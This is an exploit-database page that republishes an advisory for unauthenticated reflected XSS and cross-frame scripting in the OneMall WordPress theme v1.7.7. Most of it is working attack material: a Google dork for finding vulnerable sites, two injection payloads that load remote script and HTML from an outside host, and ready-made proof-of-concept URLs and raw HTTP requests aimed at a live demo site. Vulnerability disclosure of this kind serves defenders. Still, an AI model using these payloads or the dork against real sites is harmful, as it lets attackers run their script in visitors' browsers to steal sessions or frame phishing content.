Advertisement


Looking for a fix? Check your Codebase security with multiple scanners from Scanmycode.today


Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100178

Below is a copy:

OneMall WordPress theme v1.7.7 - Unauthenticated Reflected XSS & XFS
[+] :: Exploit Title: OneMall WordPress theme v1.7.7 - Unauthenticated Reflected XSS & XFS
[+] :: Google Dork: inurl:/wp-content/themes/onemall/
[+] :: Date: 2020-10-20
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: MAGENTECH [ https://www.magentech.com ]
[+] :: Software Version: 1.7.7
[+] :: Software Link: https://themeforest.net/item/onemall-the-multipurpose-ecommerce-marketplace-wordpress-theme/20685400
[+] :: Tested on: Kali Linux
[+] :: CVE: 
[+] :: CWE: CWE-79, CWE-1021


[i] :: Info:

An Unauthenticated Reflected XSS & XFS vulnerabilities was discovered in the OneMall theme v1.7.7 for WordPress.


[$] :: Payloads:

"><script src=https://ex-mi.ru/payload/a2r.js></script>

"><embed src=https://ex-mi.ru/payload/xfsii.html>


[!] :: PoC Unauthenticated Reflected XSS:

https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product


[!] :: PoC Unauthenticated Reflected XSS (Burp Suite):

GET /themes/sw_onemall/layout2/?category=&s=%22%3E%3Cscript+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fa2r.js%3E%3C%2Fscript%3E&search_posttype=product HTTP/1.1
Host: demo.wpthemego.com


[!] :: PoC Unauthenticated XFS:

https://demo.wpthemego.com/themes/sw_onemall/layout2/?category=&s=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E&search_posttype=product


[!] :: PoC Unauthenticated XFS (Burp Suite):

GET /themes/sw_onemall/layout2/wp-admin/admin-ajax.php?action=sw_search_products_callback&limit=5&search_type=0&query=%22%3E%3Cembed+src%3Dhttps%3A%2F%2Fex-mi.ru%2Fpayload%2Fxfsii.html%3E HTTP/1.1
Host: demo.wpthemego.com


[@] :: Contacts:

Website: ex-mi.ru
Telegram: @ex_mi
GitHub: @ex-mi
Medium: @ex-mi

Copyright ©2020 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.